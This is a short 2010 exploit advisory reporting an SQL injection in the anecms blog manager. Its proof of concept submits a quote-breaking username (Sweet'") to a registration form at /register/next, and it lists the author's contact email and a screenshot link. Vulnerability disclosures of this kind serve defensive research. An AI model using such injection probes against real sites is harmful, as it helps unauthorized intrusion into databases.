# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 727/2010

############################################################################
# #
# Exploit Title: anecms SQli #
# #
# Date: 23/08/2010 #
# #
# Author: Sweet #
# #
# Contact : charif38@hotmail.fr #
# #
# Software Link: anecms.com #
# #
# Download: anecms.com/anecms.zip #
# #
# Version: All #
# #
# Tested on: WinXp sp3 #
# Description : anecms is an open source blog manager #
# #
# #
# #
############################################################################

Sqli:

The POST variable username has been set to sweet'" on http://vulnerable.com/register/next

Poc:

http://www.example.com/register/next

username = Sweet'"

password = test

re password = test

email = charif38@hotmail.fr

then register :]

screen : http://img830.imageshack.us/img830/1213/anecm.jpg